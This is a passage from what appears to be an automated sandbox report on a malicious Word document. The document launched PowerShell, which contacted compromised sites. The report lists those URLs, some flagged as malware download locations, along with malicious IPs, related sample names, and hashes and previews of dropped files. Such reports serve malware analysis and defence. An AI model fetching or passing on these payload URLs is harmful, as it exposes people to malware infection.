                                https://b2bcom.com.br/portfolio/displays-luminosos/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cairocad.compowershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmptrue
                                • Avira URL Cloud: safe
                                unknown
                                https://b2bcom.com.br/portfolio/web-site-www-cemundodosaber-com-br/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpfalse
                                  high
                                  https://b2bcom.com.br/wp-content/uploads/2020/04/2.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_VALORES.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://hotelshivansh.compowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://ocsp.entrust.net03powershell.exe, 00000004.00000003.2110380198.000000001B625000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://arquivopop.com.br/index_htm_files/Kxh/powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://b2bcom.com.br/wp-content/uploads/2019/12/ICONE_MISSAO.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://transfersuvan.compowershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/wp-content/uploads/2019/09/icone_id-100x100.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/wp-contepowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/portfolio/design/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/servicos/branding-de-marca/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.isatechnology.comppowershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/portfolio/trabalho-8-2/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/wp-content/uploads/2019/08/4.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cairocad.com/cgi-bin/1PBB/powershell.exe, 00000004.00000002.2114718419.0000000002EF2000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.2117150009.0000000003A68000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://ownitconsignment.compowershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.brpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://cairocad.comppowershell.exe, 00000004.00000002.2115355301.00000000031C0000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.icra.org/vocabulary/.powershell.exe, 00000004.00000002.2119633139.000000001CEB7000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://b2bcom.com.br/blog/sinalizacao-seu-cartao-de-visita/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://b2bcom.com.br/wp-content/uploads/2019/03/CAIXA-2-100x100.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://investor.msn.com/powershell.exe, 00000004.00000002.2119211418.000000001CCD0000.00000002.00000001.sdmpfalse
                                    high
                                    https://b2bcom.com.br/wp-content/uploads/2019/08/logo-site-2.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://r3.o.lencr.org0powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.%s.comPApowershell.exe, 00000004.00000002.2112079841.00000000023F0000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    low
                                    https://b2bcom.com.br/portfolio/site-institucional-www-quality-esp-br/powershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://b2bcom.com.br/wp-content/themes/b2bcom/assets/js/main.jspowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://b2bcom.com.br/wp-content/uploads/2019/02/COC-SITE.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://b2bcom.com.br/wp-content/uploads/2019/04/ARQUITETURA-120x120.pngpowershell.exe, 00000004.00000002.2115397871.0000000003213000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    194.209.195.106
                                    unknownSwitzerland
                                    3303SWISSCOMSwisscomSwitzerlandLtdCHtrue
                                    35.208.182.43
                                    unknownUnited States
                                    19527GOOGLE-2UStrue
                                    177.12.163.108
                                    unknownBrazil
                                    28299IPV6InternetLtdaBRtrue
                                    103.205.64.138
                                    unknownIndia
                                    17439NETMAGIC-APNetmagicDatacenterMumbaiINtrue
                                    35.208.153.170
                                    unknownUnited States
                                    19527GOOGLE-2UStrue
                                    70.32.23.44
                                    unknownUnited States
                                    55293A2HOSTINGUStrue

                                    General Information

                                    Joe Sandbox Version:31.0.0 Emerald
                                    Analysis ID:347028
                                    Start date:01.02.2021
                                    Start time:23:17:26
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 5m 47s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:v22Pc0qA.doc.part (renamed file extension from part to doc)
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:5
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • GSI enabled (VBA)
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal96.troj.evad.winDOC@6/14@8/6
                                    EGA Information:Failed
                                    HDC Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Found warning dialog
                                    • Click Ok
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Excluded IPs from analysis (whitelisted): 192.35.177.64, 2.20.142.209, 2.20.142.210
                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                    • Execution Graph export aborted for target powershell.exe, PID 1100 because it is empty
                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • VT rate limit hit for: /opt/package/joesandbox/database/analysis/347028/sample/v22Pc0qA.doc.doc

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    23:17:40API Interceptor1x Sleep call for process: msg.exe modified
                                    23:17:41API Interceptor95x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    194.209.195.1062wUaqWdy.doc.docGet hashmaliciousBrowse
                                      35.208.182.432wUaqWdy.doc.docGet hashmaliciousBrowse
                                        GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                          177.12.163.1082wUaqWdy.doc.docGet hashmaliciousBrowse
                                            103.205.64.1382wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • hotelshivansh.com/UserFiles/8/
                                            9182483287326864.docGet hashmaliciousBrowse
                                            • hotelshivansh.com/UserFiles/8/
                                            City Report - December.docGet hashmaliciousBrowse
                                            • hotelshivansh.com/UserFiles/8/
                                            35.208.153.170MLXD7BsVDK.docGet hashmaliciousBrowse
                                            • cairocad.com/cgi-bin/udwYB7bd/
                                            70.32.23.442wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • ownitconsignment.com/files/b/
                                            2G18HC8998F36.docGet hashmaliciousBrowse
                                            • ownitconsignment.com/files/b/
                                            9182483287326864.docGet hashmaliciousBrowse
                                            • ownitconsignment.com/files/b/
                                            MX4788618039IB.docGet hashmaliciousBrowse
                                            • ownitconsignment.com/files/b/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            physio-svdh.ch2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 194.209.195.106
                                            b2bcom.com.br2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            hotelshivansh.com2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 103.205.64.138
                                            9182483287326864.docGet hashmaliciousBrowse
                                            • 103.205.64.138
                                            City Report - December.docGet hashmaliciousBrowse
                                            • 103.205.64.138
                                            transfersuvan.com2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 0.0.0.0
                                            Doc_18420540.docGet hashmaliciousBrowse
                                            • 0.0.0.0
                                            Form.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            https://moraniz.co.il/wp-content/ovFoPY4G24csbGENhcX9yJgYiF/Get hashmaliciousBrowse
                                            • 186.64.117.145
                                            factura fiscala 767958063 14 10 2020.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            9931887458-7-141020.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            Auftrag.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            Rechnung.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            Faktura.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf DQ8192826.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            DES7999474362.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf QH6464446.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            #U03c4#U03b9#U03bc#U03bf#U03bb#U03bf#U03b3#U03b9#U03bf R5725893955.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            Auftrag.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            Order.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            rapport.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            KKY9693338788.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            File-O954389.docGet hashmaliciousBrowse
                                            • 186.64.117.145
                                            ownitconsignment.com2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 70.32.23.44
                                            2G18HC8998F36.docGet hashmaliciousBrowse
                                            • 70.32.23.44
                                            9182483287326864.docGet hashmaliciousBrowse
                                            • 70.32.23.44
                                            MX4788618039IB.docGet hashmaliciousBrowse
                                            • 70.32.23.44
                                            cairocad.com2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 35.208.153.170
                                            City Report - December.docGet hashmaliciousBrowse
                                            • 35.208.153.170
                                            MLXD7BsVDK.docGet hashmaliciousBrowse
                                            • 35.208.153.170

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            IPV6InternetLtdaBR2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            68254_2001.docGet hashmaliciousBrowse
                                            • 177.12.170.95
                                            ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                            • 177.12.170.95
                                            FILE.docGet hashmaliciousBrowse
                                            • 191.6.196.95
                                            FHT210995.exeGet hashmaliciousBrowse
                                            • 177.185.193.50
                                            Doc_18420540.docGet hashmaliciousBrowse
                                            • 191.6.200.86
                                            https://mrveggy.com/resgatecarrinho/jcWVa69vj8IDsQRCud8h6RNI9Mz17JqsPPJ0DFnlbXZGyMM2GcZ3/Get hashmaliciousBrowse
                                            • 177.12.170.95
                                            INV_Xg.docGet hashmaliciousBrowse
                                            • 191.6.210.27
                                            1I72L29IL3F.docGet hashmaliciousBrowse
                                            • 191.6.212.159
                                            GT-9333 Medical report COVID-19.docGet hashmaliciousBrowse
                                            • 191.6.208.18
                                            City Report - December.docGet hashmaliciousBrowse
                                            • 191.6.208.18
                                            Emmmmmmm.docGet hashmaliciousBrowse
                                            • 191.6.213.117
                                            VQ01173428.docGet hashmaliciousBrowse
                                            • 191.6.208.15
                                            #U306b#U4fee 2020-09-19.docGet hashmaliciousBrowse
                                            • 191.6.222.114
                                            http://bhar.com.br/elementos/public/Get hashmaliciousBrowse
                                            • 191.6.196.88
                                            Untitled_7367763-38724.docGet hashmaliciousBrowse
                                            • 191.6.196.95
                                            INFO.docGet hashmaliciousBrowse
                                            • 191.6.196.95
                                            Electronic form.docGet hashmaliciousBrowse
                                            • 191.6.196.118
                                            20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                            • 191.6.192.114
                                            20160122_68121911659aa7611b6bcaae131d55b2.jsGet hashmaliciousBrowse
                                            • 191.6.192.114
                                            SWISSCOMSwisscomSwitzerlandLtdCH2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 194.209.195.106
                                            SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                            • 46.14.214.245
                                            SKM_C258201001130020005057.exeGet hashmaliciousBrowse
                                            • 46.14.214.245
                                            Mozi.mGet hashmaliciousBrowse
                                            • 178.194.165.28
                                            NormhjTcQb.exeGet hashmaliciousBrowse
                                            • 212.243.31.234
                                            pty10Get hashmaliciousBrowse
                                            • 217.193.254.91
                                            Astra.x86Get hashmaliciousBrowse
                                            • 85.0.156.99
                                            https://aplusserve.com/wp-content/plugins/antara/failed/encr-p-t-e-d/?email=maggiemk.wong@juliusbaer.comGet hashmaliciousBrowse
                                            • 193.223.56.121
                                            AWD1-2001028L PI.exeGet hashmaliciousBrowse
                                            • 194.209.228.166
                                            SWIFT COPY (2).exeGet hashmaliciousBrowse
                                            • 194.209.228.166
                                            ipz.exeGet hashmaliciousBrowse
                                            • 188.61.89.227
                                            newageGet hashmaliciousBrowse
                                            • 195.144.41.204
                                            7v1ic5IS8IGet hashmaliciousBrowse
                                            • 164.206.111.135
                                            miori.x86Get hashmaliciousBrowse
                                            • 178.196.83.123
                                            UnHAnaAW.x86Get hashmaliciousBrowse
                                            • 178.192.36.116
                                            Mozi.aGet hashmaliciousBrowse
                                            • 213.3.4.52
                                            WE3A0yB3klGet hashmaliciousBrowse
                                            • 85.1.224.116
                                            IpvLye.arm7Get hashmaliciousBrowse
                                            • 178.195.108.154
                                            whoareyou.mipsGet hashmaliciousBrowse
                                            • 178.198.75.41
                                            owari.1.sh4Get hashmaliciousBrowse
                                            • 85.4.129.183
                                            GOOGLE-2US2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 35.208.153.170
                                            INFO_2020.docGet hashmaliciousBrowse
                                            • 35.208.69.64
                                            REMITTANCE ADVICE REF0000360261_PDF.xlsxGet hashmaliciousBrowse
                                            • 35.214.170.96
                                            gDvIZEJQF2.xlsGet hashmaliciousBrowse
                                            • 35.214.243.127
                                            68254_2001.docGet hashmaliciousBrowse
                                            • 35.209.96.32
                                            IMG-11862.docGet hashmaliciousBrowse
                                            • 35.208.61.46
                                            ARCHIVOFile-20-012021.docGet hashmaliciousBrowse
                                            • 35.209.96.32
                                            Calculation-380472272-01262021.xlsmGet hashmaliciousBrowse
                                            • 35.208.103.169
                                            453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                            • 35.214.159.46
                                            MPbBCArHPF.exeGet hashmaliciousBrowse
                                            • 35.208.174.213
                                            TBKK E12101010.xlsxGet hashmaliciousBrowse
                                            • 35.208.174.213
                                            ARCH-SO-930373.docGet hashmaliciousBrowse
                                            • 35.209.96.32
                                            Info_C_780929.docGet hashmaliciousBrowse
                                            • 35.214.159.46
                                            Factura.docGet hashmaliciousBrowse
                                            • 35.209.114.34
                                            DAT 30 122020 664_16167.docGet hashmaliciousBrowse
                                            • 35.214.159.46
                                            Beauftragung.docGet hashmaliciousBrowse
                                            • 35.209.114.34
                                            sample2.docGet hashmaliciousBrowse
                                            • 35.214.199.246
                                            55-2912.docGet hashmaliciousBrowse
                                            • 35.209.78.196
                                            DAT_G_0259067.docGet hashmaliciousBrowse
                                            • 35.214.169.246
                                            DAT_G_0259067.docGet hashmaliciousBrowse
                                            • 35.209.78.196

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            05af1f5ca1b87cc9cc9b25185115607d2wUaqWdy.doc.docGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            IMG_1660392.docGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            2021BLL0201.doc__.rtfGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            order.docGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            INWARD-OUTWARD ANALYSIS.xlsxGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            Doc29012010.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            H8996571.docmGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            H8996571.docmGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            Royalmail-Shipment.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            AXm99h7qFP.docGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            SecuriteInfo.com.Trojan.DOC.Agent.ATB.23360.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            SecuriteInfo.com.Trojan.DOC.Agent.ATB.16402.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            SecuriteInfo.com.Exploit.Siggen3.8755.4152.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            SecuriteInfo.com.Trojan.DOC.Agent.ATB.23237.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            SecuriteInfo.com.Exploit.Siggen3.8717.25519.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            notice-7468.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            info.9215.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            info-8920.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            shared_document.xlsGet hashmaliciousBrowse
                                            • 177.12.163.108
                                            malware.docGet hashmaliciousBrowse
                                            • 177.12.163.108

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):59134
                                            Entropy (8bit):7.995450161616763
                                            Encrypted:true
                                            SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                            MD5:E92176B0889CC1BB97114BEB2F3C1728
                                            SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                            SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                            SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893
                                            Entropy (8bit):7.366016576663508
                                            Encrypted:false
                                            SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                            MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                            SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                            SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                            SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):328
                                            Entropy (8bit):3.084754685484955
                                            Encrypted:false
                                            SSDEEP:6:kKhhXbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Te3kPlE99SNxAhUeo+aKt
                                            MD5:01C96E3016D3AF70BA00DE7E8D2BF065
                                            SHA1:7378216B20D79AAA888718D6D67F75ECBBD23844
                                            SHA-256:E27DB22B829833E8A173F72416126E5EAAD77F6DE965CC1520F0D90D869D9F5B
                                            SHA-512:D5BDAB326B3268AA85A43EB404F3663DE8AA4A886AE8D05BFF27D8A9786D348EEEDFDBE576CCEC29963DC178C72DDC893A94AB9BA77B575362E3B5C168DE1D7A
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ..........j.3...(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252
                                            Entropy (8bit):3.008649533985198
                                            Encrypted:false
                                            SSDEEP:3:kkFklWk3lXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKI3fliBAIdQZV7eAYLit
                                            MD5:A5FD641BC4A0D1A78D07A1E8D23DAD78
                                            SHA1:09E7EAF079726D1EC00E3FF658B4D3394D532A70
                                            SHA-256:18B28B1A452FF7B8A1AA0AE23BFA62F7F48D76F61514791F7E255AC47195FC6E
                                            SHA-512:E6F93B797233E917A106AF7AAE86F5B51A6E929E2FF9EB850561E41F643DFC2EDB6D34EB43608B4F3DB53FBED343C09EF46DFA761EBD9A98D3ECCEAB5E9E3600
                                            Malicious:false
                                            Reputation:low
                                            Preview: p...... ....`...I.5.3...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{438FF120-FFD8-4816-B513-C2DC6937B540}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AA0F645-B329-43DD-B4C5-CD1B0F0382FA}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.3586208805849456
                                            Encrypted:false
                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbV:IiiiiiiiiifdLloZQc8++lsJe1Mzqn
                                            MD5:4304A5424E9C13882063E026F3C316EE
